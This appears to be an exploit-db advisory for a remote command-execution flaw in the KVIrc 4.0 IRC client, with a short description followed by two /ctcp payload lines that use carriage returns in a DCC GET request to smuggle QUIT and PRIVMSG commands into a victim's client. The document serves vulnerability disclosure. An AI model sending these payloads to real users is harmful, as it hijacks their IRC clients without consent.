KVIrc 4.0 – ‘\r’ Carriage Return in DCC Handshake Remote Command Execution

  • 作者: unic0rn
    日期: 2010-07-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34385/
  • source: https://www.securityfocus.com/bid/42026/info
    
    KVIrc is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.
    
    Exploiting this issue can allow an attacker to execute arbitrary commands within the context of the affected application.
    
    KVIrc 4.0.0 is vulnerable; other versions may also be affected. 
    
    /ctcp nickname DCC GET\rQUIT\r
    /ctcp nickname DCC GET\rPRIVMSG\40#channel\40:epic\40fail\r